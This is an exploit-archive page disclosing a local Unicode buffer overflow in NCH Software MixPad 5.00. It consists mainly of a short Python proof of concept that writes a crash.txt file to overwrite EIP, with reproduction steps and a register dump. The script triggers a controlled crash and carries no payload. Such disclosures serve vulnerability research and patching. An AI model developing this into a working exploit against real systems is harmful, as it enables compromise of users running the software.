MixPad 5.00 Buffer Overflow

2018.01.23
Credit: bzyo
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/python # # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title: NCH Software MixPad v5.00 - Unicode Buffer Overflow # Date: 21-01-2017 # Vulnerable Software: NCH Software MixPad # Vendor Homepage: http://www.nch.com.au/mixpad # Version: v5.00 # Software Link: http://www.nch.com.au/mixpad/mpsetup.exe # Tested On: Windows XP # # # PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound' # # no unicode jmp/call to esp # # EAX 00117700 # ECX 001167F0 # EDX 7C90E514 ntdll.KiFastSystemCallRet # EBX 00000000 # ESP 00116C40 UNICODE "BBBBBB does not exist or cannot be accessed." # EBP 00116FAC # ESI 0000004E # EDI 00117740 # EIP 00CC00CC filename="crash.txt" junk = "A"*251 eip = "\xcc"*2 #eip over; jmp/call esp goes here fill = "B"*100 #only 6 used in esp buffer = junk + eip + fill textfile = open(filename , 'w') textfile.write(buffer) textfile.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top